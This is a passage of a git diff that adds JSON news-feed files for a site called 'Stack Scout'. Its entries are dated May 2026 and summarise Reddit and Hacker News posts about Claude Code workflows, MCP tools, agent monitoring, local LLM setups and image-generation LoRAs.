rebuilds my reasoning from scratch, usually wrong. 2. Index the codebase as a graph. A codebase-memory server builds a knowledge graph of the repo. Functions, callers, dependencies, cycles. When Claude needs to know what calls processOrder, it queries the graph instead of grepping blind. One tool call replaces dozens of file reads. 3. Search with Tavily for current practice. Before any non-trivial decision I let it search what people are actually doing right now. Training data is old. Best practices from a year ago aren't always still best practices. Clean answer with sources, not a wall of SEO spam. 4. 
Load Context7 for library doc…", + "category": "ai_tools" + }, + { + "title": "Dunetrace: Real-time monitoring of your production agents", + "url": "https://reddit.com/r/StableDiffusion/comments/1t9wib2/dunetrace_realtime_monitoring_of_your_production/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "open_source", + "tool_update" + ], + "matching_tags": [ + "api_update", + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-11T07:52:28.000Z", + "summary": "I have been building Dunetrace, a open-source real-time monitoring tool for your production agents. **Problem:** When agent run, they return a confident answer. But sometimes in reality the answer is wrong and consumed lot of tokens due to tool loop or some other silent failures. All the existing tools are good once something is broke and you can debug. I wanted something that alerts before the user notices. The latest update adds: **Cross-agent pattern analysis.** Dunetrace now shows you which detectors are firing across your entire agent fleet, not just per-run alerts. TOOL\\_LOOP fired on 18% of your example-agent runs this week and it's trending up? That's a code bug, not a transient failure. Agent health score 0–100 per agent\\_id. **Langfuse deep analysis.** Connect your Langfuse API key and you get an 'Explain with Langfuse' button on every signal. Dunetrace fetches the trace, reads the actual system prompt, and tells you exactly whats missing. You get the root-cause from real evidence. **Custom typescript, python agent integration**. A few of you were building custom agents outside LangChain. There's now a zero-dependency integration. 
**GitHub repo:** [https://github.com/dun…", + "category": "creative_tools" + }, + { + "title": "I catalogued every way local models break JSON output and built a repair library, here's what I found across 288 model calls", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tagtpv/i_catalogued_every_way_local_models_break_json/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-11T21:17:18.000Z", + "summary": "I've been running structured output prompts through a bunch of models on OpenRouter for the past few months — Llama 3, Mistral, Command R, DeepSeek, Qwen, and every other model on OpenRouter — alongside the usual closed-source suspects. 288 calls total. I wanted to know what actually breaks, how often, and whether open models fail differently from the API-only ones. Short answer: not really. The failure modes are almost identical across the board. The *rate* varies — some models hit you with markdown fences on nearly every call, others only when you phrase the prompt a certain way; but the categories of breakage are the same everywhere. What I saw most, roughly in order: 1. Markdown fences wrapping the JSON (the model thinks it's being helpful) 2. Trailing commas (JS habits from training data) 3. Python `True`/`False`/`None` instead of JSON `true`/`false`/`null` 4. Truncated objects from running out of tokens mid-response 5. Unescaped quotes inside string values 6. `//` or `#` comments inside JSON 7. 
Literal `...` where the model got lazy and didn't generate all the data The reason I'm posting here specifically: most of the advice I see for handling this is \"just use JSON mode\" or…", + "category": "ai_models" + }, + { + "title": "What improved my Claude Code workflow: stop treating it like chat, start treating it like a dev with a workstation", + "url": "https://reddit.com/r/ClaudeAI/comments/1taelgl/what_improved_my_claude_code_workflow_stop/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-11T19:59:39.000Z", + "summary": "The most useful improvement I’ve found for Claude Code-style work has not been a magic prompt. It has been changing the shape of the task. When I give an agent a vague request, I get vague work. When I give it a real workstation + a real ticket, the results get much more predictable. The workflow that has been working for me: **1. Start with a ticket, not a prompt** A good ticket has: * goal * exact repo/path/context * acceptance criteria * test command * files or areas that are off-limits * expected output * whether the agent is allowed to make changes or only investigate Example: “Find why the billing page shows an empty state for active subscriptions. Do not change pricing or Stripe webhook logic. Add a regression test if possible. Run npm test. Summarize the root cause and changed files.” That tends to work much better than: “Fix the billing page.” **2. Give the agent a persistent environment** A lot of coding-agent work is not pure reasoning. It is environment work: * clone repo * install dependencies * inspect file structure * run tests * inspect logs * patch * rerun * generate output When the environment disappears after the conversation, the agent loses useful state. 
A per…", + "category": "ai_tools" + }, + { + "title": "The Claude Platform on AWS is now generally available.", + "url": "https://reddit.com/r/ClaudeAI/comments/1ta7p4n/the_claude_platform_on_aws_is_now_generally/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-11T16:03:57.000Z", + "summary": "AWS customers get the full set of Claude API features, with AWS authentication, billing, and commitment retirement. Build and deploy agents at scale with Claude Managed Agents, or use features like the advisor strategy, code execution, web search, web fetch, the Files API, MCP connector, prompt caching, citations, and batch processing. Anthropic operates the service, and all new features ship the same day they go live on the native Claude API. Claude also remains available on Amazon Bedrock, where AWS is the data processor. This is a good fit for teams with strict regional data residency requirements or that need data processed exclusively within AWS infrastructure. Read more: [https://claude.com/blog/claude-platform-on-aws](https://claude.com/blog/claude-platform-on-aws)", + "category": "ai_tools" + }, + { + "title": "Claude Code Orchestrator -> Sub-agent local LLM", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t9xyku/claude_code_orchestrator_subagent_local_llm/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-11T09:17:33.000Z", + "summary": "Not written by an AI, so bear with me :P Has anyone else tried to use their local LLM in conjunction with Claude Code? I looked into [Pi.dev](http://Pi.dev) a bit, and from their documentation, I read about their RPC Mode which allows me to send command line commands to it. So I'm thinking of making a MCP Claude Code can utilize to use [Pi.Dev](http://Pi.Dev) as a sub-agent and save a bit of usage. 
My line of thinking is: Claude Code orchestrator -> Local LLM -> Claude Code reviewing the code in the PR. Anyone tries this? Am I missing something or am I a monday morning genious?", + "category": "ai_models" + }, + { + "title": "Anyone else think the 1T Valuation is dangerous for Anthropic?", + "url": "https://reddit.com/r/ClaudeAI/comments/1t9vuw5/anyone_else_think_the_1t_valuation_is_dangerous/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 1, + "date": "2026-05-11T07:14:55.000Z", + "summary": "TLDR: The market's 1T valuation is pricing for perfection. I think there are 4 ways this perfection doesn't happen. I love Claude and Claude Code, I use it every day, and their revenue numbers (30B ARR) are amazing, and if I had a chance to invest in Anthropic a month ago, I would. But... now it is reaching **1 Trillion** valuation on secondary market. It took Apple 40 years to reach, 5 years for Anthropic. A valuation so high means it has limited growth. It's clearly driven by FOMO. If it has a down round, it would be a disaster. I see a few vulnerabilities that can cause Anthropic to go down. 1. **Models are improving but others are catching up** Opus 4.7 wasn't a big upgrade, and \"Mythos\" still isn't public. Competitors are closing fast, and switching is one click away. If a new model launched tomorrow at 80% of Claude's quality and 3% the cost, I'd hesitate. But at 95% quality and 50% cost? I'd switch the same day. And so would everyone else paying enterprise rates. 2. **Limited revenue sources** Of that $30B ARR, the open guess is 60%+ comes from Claude Code and developer API. 
That's a single customer segment, and it's the exact segment OpenAI, Google, and every well-funded s…", + "category": "ai_tools" + }, + { + "title": "Markdown browser for LLMs", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t9tsro/markdown_browser_for_llms/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-11T05:23:15.000Z", + "summary": "I built a markdown web renderer for AI agents. Instead of taking expensive screenshots and piping them through vision models, TextWeb renders web pages as markdown that LLMs can reason about natively. Full JavaScript execution, interactive elements annotated. It provides a CLI and an MCP server. You can find it here: [https://github.com/woheller69/textweb](https://github.com/woheller69/textweb) The LLM can do things like: navigate a web page, scroll up/down, enter text into input fields, click buttons, etc. Works with llama.cpp web UI. It is based on [https://github.com/chrisrobison/textweb](https://github.com/chrisrobison/textweb) which has a text grid renderer instead of markdown.", + "category": "ai_models" + }, + { + "title": "I upgraded my Agent OS to a local 35B model and its code failure rate dropped to 0%", + "url": "https://reddit.com/r/ClaudeAI/comments/1t9tqz6/i_upgraded_my_agent_os_to_a_local_35b_model_and/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-11T05:20:39.000Z", + "summary": "I’ve been obsessed with autonomous agents lately, but it got tiring when they keep hitting walls because they didn't have the right \"tools\" or because their context window turned to mush after an hour. 
I’ve found that local multi-agent systems where agents are driven by an aversive state (a suffering system) to autonomously write, sandbox, and hot-load their own tools so they don't hit walls has worked quite well. When an agent encounters something it hasn’t seen before, it builds a new tool for the job, tests it in a sandbox, registers it, lets the other agents know, then keeps rolling. It’s able to build an infinite library of anything it may need in the future, completely autonomously without a human ever in the loop. Repo: [https://github.com/ninjahawk/hollow-agentOS](https://github.com/ninjahawk/hollow-agentOS) *Isn’t letting local LLMs write their own code at runtime going to get too chaotic and brick the OS fast?* With a small model (like the 9B fallback), possibly. Under high system stress, a 9B model panics. It rushes, hallucinates invalid function calls, and tries to force broken syntax past the gates. But I just scaled the default runtime engine to **Qwen 3.6 35B A3B**…", + "category": "ai_tools" + }, + { + "title": "Natural Woman V2 - Z Image Turbo Lora", + "url": "https://reddit.com/r/StableDiffusion/comments/1t9oono/natural_woman_v2_z_image_turbo_lora/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 1, + "date": "2026-05-11T01:14:23.000Z", + "summary": "Hey all, I finally got around to training a new version to my natural woman lora. The point being to fix the actor face that ZIT can tend to produce. The first version was ok but there were many cases where the image produced was lack luster or downright bad. This version accomplishes the goal while not corrupting the model. Download it here: [https://civitai.com/models/2207094?modelVersionId=2935386](https://civitai.com/models/2207094?modelVersionId=2935386) Only thing is, models tend to look back over shoulder even when prompted to face forward. 
I'm pruning the dataset to train a 2.1 version to fix this so look out for that. Also, while I've found that the actor face does not affect men as much as woman, I am training a natural-men lora as well. Look out for that soon.", + "category": "creative_tools" + }, + { + "title": "I have to pretend I hate image generation AI to avoid getting banned or insulted on 99% of Reddit or the internet, even though Stable Diffusion is actually what I like and am most excited about right now. Why do people hate AI so much, esp…", + "url": "https://reddit.com/r/StableDiffusion/comments/1tahphc/i_have_to_pretend_i_hate_image_generation_ai_to/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-11T21:50:34.000Z", + "summary": "I'm not even saying I care if they know the difference between open-source and closed-source image-generating AI, or if they insult me ​​or not. What I want to know is why so many people hate AI, especially image-generating AI. At first, I thought it only bothered artists, because they're afraid their artwork will be stolen or something. Then I thought it might also bother those who are afraid of not being able to distinguish AI from reality. But it's practically 99% of people who hate AI, and I just can't understand why.", + "category": "creative_tools" + }, + { + "title": "Sibling to Anthropic's Claude FM — where Claude FM curates, WRIT-FM operates", + "url": "https://reddit.com/r/ClaudeAI/comments/1tagr4x/sibling_to_anthropics_claude_fm_where_claude_fm/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-11T21:14:52.000Z", + "summary": "Anthropic shipped `/radio` this week - Claude Code now has a lofi button that opens Claude FM, a stream curated by human musicians. I'll use it. 
I built WRIT-FM - a 24/7 AI radio station where every layer is model output, not a hand-picked playlist: * **Music**: AI-generated. No catalog, no human picks. Tracks produced per show by ACE-Step via a local music-gen server. * **Talk**: Claude CLI writes the hosted breaks - deep dives, news analysis, panel debates, listener mailbags, music essays. Kokoro TTS speaks them in 5 distinct voices. * **Hosts**: The Liminal Operator (philosophy), Dr. Resonance (music archaeology), Nyx (night/dreams), Signal (news analysis), Ember (soul/groove). They rotate across 8 shows. Sundays at 18:00 a Listener Hours mailbag replaces the regular slot. * **Broadcast**: ezstream → Icecast → Cloudflare tunnel → optional YouTube RTMP relay. * **Operator**: a Claude Code agent on a 15-minute loop. Health-checks the encoder, stocks music and talk segments for upcoming slots, turns listener messages into on-air responses, grows per-station topic banks when scheduled focus areas thin out, and writes *intent cards* that steer specific upcoming segments. The piece I…", + "category": "ai_tools" + }, + { + "title": "prompt caching, but for rl training - 7.5x speedup on long-prompt/short-response workloads", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tage06/prompt_caching_but_for_rl_training_75x_speedup_on/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-11T21:01:45.000Z", + "summary": "most open source RL engines pack sequences naively: prompt + response, repeated for every sample in the group. this is fine for short prompt, long completion workloads but inefficient for long prompt, short completion workloads. with 1000-token prompts and 100-token responses at G=8, you're processing 8800 tokens when only 1800 are unique. about 5x wasted compute. the fix is conceptually simple: compute the prompt once, then compute all G responses after it. 
it's analagous to inference prefix caching, except training needs gradients to flow back through the prompt, which breaks causal attention in the obvious implementation. getting it right required different tricks for full vs. linear attention layers. you can read about it in the blogpost in the comments. Numbers on Qwen3.5-4B: \\- 16k prompt / 64 out → 7.5x \\- 16k / 128 → 7.3x \\- 16k / 1k → 5.4x \\- 8k / 4k → 1.7x", + "category": "ai_models" + }, + { + "title": "GitLab announces workforce reduction and end of their CREDIT values", + "url": "https://about.gitlab.com/blog/gitlab-act-2/", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-11T20:51:57.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-12.json b/data/news-feed-2026-05-12.json new file mode 100644 index 0000000..6fbf421 --- /dev/null +++ b/data/news-feed-2026-05-12.json @@ -0,0 +1,259 @@ +{ + "generated": "2026-06-05T00:44:39.379Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-12", + "article_count": 15, + "archived_story_count": 612, + "articles": [ + { + "title": "TUI to actually see what Claude Code is doing: cost, loops, tool commands…", + "url": "https://reddit.com/r/ClaudeAI/comments/1tb669z/tui_to_actually_see_what_claude_code_is_doing/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-12T16:08:47.000Z", + "summary": "I was running blind watching Claude Code work, could not tell where my money was going, when it was stuck in a loop, or what it was doing with my filesystem. So i built something open source to make it visible. works with Claude Code, Codex CLI, Gemini CLI, Cursor, and any MCP server. 
A scan of my own machine for the last 90 days showed what i do been missing: \\- $14K spend across 39 sessions \\- 129 agent loops, \\~20% wasted iterations (mostly Edit-in-circles on the same 5 files) \\- 3 credential leaks in tool input (JWTs, GitHub tokens, GCP keys) \\- 5 sensitive paths an AI could reach at any moment (\\~/.ssh, \\~/.npmrc, gcloud creds) \\- 2 dangerous commands node9 would have blocked Now i can: \\- See where my money is going in real time \\- Catch the most dangerous commands before they finish running \\- Stop or continue a run while it's happening \\- Analyze the data after the fact, any time range The live dashboard: \\- High level: cost, tokens, command counts, all live \\- Notifications: loops + critical commands surface here so i can make a call before things go sideways \\- Live feed: the commands Claude is running right now \\- Live security: dangerous actions the AI is taking \\- Liv…", + "category": "ai_tools" + }, + { + "title": "I built a Mac app that turns Claude Code agents into live radio stations | Free & open source", + "url": "https://reddit.com/r/ClaudeAI/comments/1tasoqo/i_built_a_mac_app_that_turns_claude_code_agents/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-12T06:01:21.000Z", + "summary": "**TL;DR:** Agent FM is an open-source Mac app that lets you tune in to your Claude Code and Codex agents while they work, so you can stay in the loop and hear their progress live. Each agent gets its own live radio station. You can tune in to one agent, or listen to a Global Mix across all active agents. It surfaces progress, blockers, decisions, errors, and attention requests in real time. GitHub: [https://github.com/agentfm-ai/agent-fm](https://github.com/agentfm-ai/agent-fm) Hey everyone! 
How do you stay in the loop when multiple AI coding agents are running at the same time? That was the problem I kept running into. At some point, it became normal to have several Claude Code and Codex sessions running at once across different repos. Sometimes 8-10. The agents move quickly, but staying on top of them still means reading terminal transcripts across a bunch of windows. That workflow was broken in a very specific way: * I would miss which agent was blocked. * I would miss which one needed approval. * I would lose track of which files changed. * I would have to context-switch between terminals just to answer \"what is this agent doing right now?\" * The agents could run in parallel,…", + "category": "ai_tools" + }, + { + "title": "Steam Recommender using similarity! (Undergraduate Student Project) [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tb8k3n/steam_recommender_using_similarity_undergraduate/", + "source": "Reddit r/MachineLearning", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 1, + "date": "2026-05-12T17:30:32.000Z", + "summary": "(DISCLAIMER: I accidentally deleted the last post on this subreddit my apologies if this is your second time seeing it) Last year I made a [post](https://www.reddit.com/r/datascience/comments/1lkjxmr/steam_recommender_using_vectors_student_project/) about my steam recommender The last one was great and served its purpose of showing many people new games, But this new version is much more functional! I love making recommendation systems that tell the user WHY they got the recommendation. During a steam sale event, I always find myself trying to look for new video games to play. If I wanted to find a new game I would try to whittle it down by using steam tags, but the steam tag system is very broad \"action\". could apply to many many games. That got me thinking, what aspects do I like about my favorite games? 
Well I like Persona 4 because of the city vibes and jazz fusion, Spore because of the unique character creation and whimsical theme. Balatro for its unique deck building synergies. What if I could capture unique tags that identify a game that aren't just \"action\" and put them into vectors to show the (focus) of a game For example I could break persona 4 into something like Game…", + "category": "ai_research" + }, + { + "title": "Elgato Stream Deck Usage Plugin", + "url": "https://reddit.com/r/ClaudeAI/comments/1tb6exu/elgato_stream_deck_usage_plugin/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-12T16:16:59.000Z", + "summary": "Wanted an easier way of keeping an eye on my usage, so created this plugin for the Elgato Stream Deck. Five keys, exact percentages from your account: current 5-hour session, weekly all-models, weekly Sonnet, weekly Claude Design, monthly extra credits. Each shows a reset countdown. Tap any key to open the Settings page directly. It calls Anthropic's own usage endpoint with the OAuth token Claude Code already stores locally — same data the Settings page shows, no separate API key, nothing leaves your machine. Windows + Mac, classic Stream Decks (MK.2 / XL / Mini / Neo). One-click installer + source: [https://github.com/Darhkfox/streamdeckclaude](https://github.com/Darhkfox/streamdeckclaude) *Caveat: the endpoint is undocumented so Anthropic could break it. Works fine today.* Enjoy! 
(also the first time i've used github so hope all works fine!)", + "category": "ai_tools" + }, + { + "title": "Can we acknowledge that Anthropic watches open sourcers and copies them?", + "url": "https://reddit.com/r/ClaudeAI/comments/1tayk1l/can_we_acknowledge_that_anthropic_watches_open/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-05-12T11:19:48.000Z", + "summary": "I’ve been seeing over the past few months an interesting phenomenon, an open sourcer makes a tool or MCP < Anthropic adds functionality for that exact thing a couple weeks later < repeat. The biggest examples are Openclaw (like 5 features, including cowork), persistent memory across chats, and latest example of the “goal” feature being added. This is obvious and I’m not really saying anything that’s revolutionary here, I’m sure we’ve all noticed it. My larger observation, no credit is given, they’re just copying and then providing a direct replacement for things open sourcers thought of. At this level, we’re all learning from each other. AI like it is right now is very new and you could even argue that they’re not copying, that we’re all just thinking the same things. The deeper issue though is that this shows a dystopian effect of AI, the big companies get the credit widely for things others have done. More people have heard about Claude cowork than have heard about Openclaw, and the result of the guy who made it was getting a job at OpenAI. He wasn’t able to make this into a business, it’s not how open source has been for the past 20 years where an idea can be copied but n…", + "category": "ai_tools" + }, + { + "title": "Cache-testing software for LLM-provider-style tiered ephemeral caches? 
[D]", + "url": "https://reddit.com/r/MachineLearning/comments/1tayaiw/cachetesting_software_for_llmproviderstyle_tiered/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-12T11:07:23.000Z", + "summary": "I'm looking for a cache simulator / benchmark suite suited to the kind of tiered ephemeral cache that LLM providers use — e.g. Anthropic's 4-tier prompt cache, where context sits across several tiers with different residency windows, costs, and eviction rules. I've already tried **libCacheSim**. It's a solid piece of software for classical caches (LRU, FIFO, ARC, SIEVE, S3-FIFO, W-TinyLFU, Belady oracle, plugin API, trace replay), and I got a plugin + synthetic trace working against it. But it seems fundamentally aimed at single, flat caches: * One cache, not a hierarchy of tiers with different costs * No notion of partial / multi-tier residency of the same object * Misses are uniform-cost — no way to express \"miss to L1 vs miss to L3 vs full recompute,\" which is the whole point in LLM prompt caching * Trace model is atomic get/put, not edit streams where cached objects mutate in place * No first-class support for token-weighted object sizes So it works as a baseline comparator, but it's not really the right shape for evaluating LLM-cache policies. 
**Does anyone know of cache-testing software specifically targeting LLM-provider-style caches?** Something that models multiple tiers…", + "category": "ai_research" + }, + { + "title": "Claude MCP integration made my old meeting notes actually useful again", + "url": "https://reddit.com/r/ClaudeAI/comments/1tb2ns8/claude_mcp_integration_made_my_old_meeting_notes/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 0.99, + "date": "2026-05-12T14:05:14.000Z", + "summary": "I’ve been testing the new Claude MCP integration with Bluedot and it changed how I use meeting notes completely. Before this, most meeting transcripts just sat there after the call. Now I can chat with all my past meetings directly inside Claude, pull context from old discussions, search decisions, action items, summaries, recordings, and combine that with info from other tools too. What I like about Bluedot is that it stays out of the meeting itself, no bot joining the call, but still captures everything cleanly in the background. The searchable meeting history is honestly the biggest feature for me now. Anyone else experimenting with Claude MCP workflows yet?", + "category": "ai_tools" + }, + { + "title": "Converted Karpathy's coding skill from Pro to free plan. Here's the full thing:", + "url": "https://reddit.com/r/ClaudeAI/comments/1tavcuo/converted_karpathys_coding_skill_from_pro_to_free/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.99, + "date": "2026-05-12T08:29:36.000Z", + "summary": "The Karpathy coding skill is locked behind Pro. It doesn't use any Pro-only features, so I rewrote it for free plan chat workflows. Same philosophy, tuned for no terminal, no subagents, and a shorter context window where mistakes are expensive. 
Paste the whole thing into a Project's custom instructions or use it as a system prompt. It auto-triggers on any coding request. --- name: karpathy-coding description: Apply Karpathy-inspired coding discipline to any programming task. Use this skill whenever the user asks you to write, fix, refactor, extend, or review code — even casually (\"can you add X\", \"why is this breaking\", \"clean this up\"). Also trigger when the user pastes code and asks a question about it, when they describe a feature or bug, or when they use words like \"implement\", \"build\", \"add\", \"fix\", \"change\", or \"improve\" in a technical context. This skill is especially valuable on the free plan where mistakes are costly because regenerating and iterating burns the context window fast. compatibility: claude-code opencode --- # Karpathy Coding Guidelines Derived from Andrej Karpathy's observations on LLM coding pitfalls, adapted for chat-first workflows (no terminal, no subage…", + "category": "ai_tools" + }, + { + "title": "What MCP servers are you guys using for persistent memory?", + "url": "https://reddit.com/r/ClaudeAI/comments/1taq1ub/what_mcp_servers_are_you_guys_using_for/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 0.96, + "date": "2026-05-12T03:49:32.000Z", + "summary": "Getting really tired of pasting the same project docs into claude every morning. I started testing the recall MCP integration to pipe my saved pdfs and web clips directly into my editor so claude actually has long-term context on what i'm building. It works pretty well, but i'm wondering what other tools you guys are using for MCP memory right now? 
Just trying to see what the standard stack is for keeping claude grounded.", + "category": "ai_tools" + }, + { + "title": "I realized character consistency breaks after the first few images", + "url": "https://reddit.com/r/StableDiffusion/comments/1tb281q/i_realized_character_consistency_breaks_after_the/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 0.9, + "date": "2026-05-12T13:49:35.000Z", + "summary": "I was trying to make the same character show up across a few different scenes last week, and the first image looked fine. Then I tried changing the setting, the lighting, the pose, and the mood a little. Not even anything extreme. Just enough to make the character feel like they were doing something else. That was where everything started to drift. The face was almost right, but not really. The outfit changed in tiny ways. One reference worked better than another, but I forgot which one I used. A prompt line from yesterday gave better results, but it was buried in a different chat. I had drafts in one folder, references in another, and “final” images that were not really final. At some point I realized the problem was project memory. For one image, a good prompt or LoRA can be enough. For a repeatable character series, I need a way to keep the character, references, prompts, sessions, and generated artifacts together, so I can come back tomorrow and still know what happened. That is what we have been testing with OpenMelon. It is an open-source content-creation agent that runs in the terminal. 
It is not an image model and it is not trying to replace SD, ComfyUI, LoRAs, or whatever…", + "category": "creative_tools" + }, + { + "title": "My First Official AI Research Paper Accepted on SSRN", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tbht4h/my_first_official_ai_research_paper_accepted_on/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-12T23:04:46.000Z", + "summary": "https://preview.redd.it/oz4vpoxdfs0h1.jpg?width=910&format=pjpg&auto=webp&s=fa4c91aad0e3c56850fbfc06099e9c4095712bbd Today, my research paper **“Stable Training with Adaptive Momentum (STAM)”** was officially accepted on **SSRN** — marking my first documented and official publication as an AI Researcher. The paper introduces a new optimization algorithm for deep learning training that outperformed several popular optimizers in selected benchmarks, addressed multiple training stability challenges, and achieved up to **50% reduction in computational training cost** in some experiments. This is an important milestone in my research journey, and I’m excited to continue exploring optimization techniques for efficient and stable AI training. 
You can read the paper here: [https://papers.ssrn.com/sol3/papers.cfm?abstract\\_id=6699059](https://papers.ssrn.com/sol3/papers.cfm?abstract_id=6699059)", + "category": "ai_models" + }, + { + "title": "What solutions are you using to boost TPS and Context Window?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tbe3yz/what_solutions_are_you_using_to_boost_tps_and/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-12T20:42:32.000Z", + "summary": "**Server Specs:** 16 Gigs DDR5 AMD Ryzen 5 7600X 4.7 GHz 6-Core Processor AMD Radeon Sapphire Nitro+ 7900XTX NZXT N7 B650E ATX AM5 Motherboard **Performance:** I'm running Qwen27b Q4 at 80k context on a Sapphire Nitro+ Radeon 7900XTX 24Gb at 40 t/s. My setup is Llama.cpp + Vulcan. **Question:** I've been having a blast with it, but it's time for some extra power under the hood. The return rate is just slow enough to be annoying with tooling, and the context window is just short enough to not handle low-end big tasks. In a perfect world I'm running 120-140 Context at 60t/s. Hardware upgrades aside, what are some software changes that you guys have found that work?", + "category": "ai_models" + }, + { + "title": "How many years do you think we are from making feature films at home?", + "url": "https://reddit.com/r/StableDiffusion/comments/1tbdxnw/how_many_years_do_you_think_we_are_from_making/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-12T20:36:10.000Z", + "summary": "What would be your LLM(AI) Stack? Also Tools/Github repos? How long would it take to complete a feature film(60-90 mins) approximately? * Image Models : ??? * Audio Models : ??? * Video Models : ??? * LoRA/Finetunes/Workflows/etc., : ??? * Tools/Github Repos : ??? * Misc : ??? For Non-AI, we have so much FREE / Open source Tools. 
Sharing the stack I collected for my future short filmmaking. * (Raster) Image : GIMP, paint.NET, Pinta * (Vector) Image : Inkscape, Karbon, LibreOffice Draw * Painting : Krita * Animation : Blender, Krita, Synfig, Pencil2D, TupiTube, Pivot Animator * Audio Editing : Audacity, Ardour * Video Editing : OpenShot, Shotcut, Kdenlive, Davinci Resolve * Video : HandBrake * Digital compositing : OpenShot, Shotcut, Blender, Natron * Writing : FocusWriter, Manuskript, yWriter * Screenwriting : Trelby, Celtx Randomly found [this (2+ years) old thread](https://www.reddit.com/r/StableDiffusion/comments/18kfoln/how_many_years_do_you_think_we_are_from_making/) (Nice thread & comments) which forced me to post this thread Even without AI, some filmmakers already made films alone(except few stuffs like Voice-overs or editing), talking about animation films here. Shari…", + "category": "creative_tools" + }, + { + "title": "Chroma1-HD Character Transfer with Flux.2 Dev", + "url": "https://reddit.com/r/StableDiffusion/comments/1tbdj5o/chroma1hd_character_transfer_with_flux2_dev/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-12T20:21:51.000Z", + "summary": "[Chroma1-HD with Flux.2 Dev character transfer](https://preview.redd.it/ptcx9u60kr0h1.png?width=1920&format=png&auto=webp&s=f1616927e93b3300a7416d5758198b42f8ce4c81) This workflow gives multi-modal capabilities to open-source image models. In particular, this workflow combines a text-to-image workflow (Comfy's official Chroma1-HD workflow) and an image-to-image workflow (Comfy's official Flux.2 Dev workflow). 
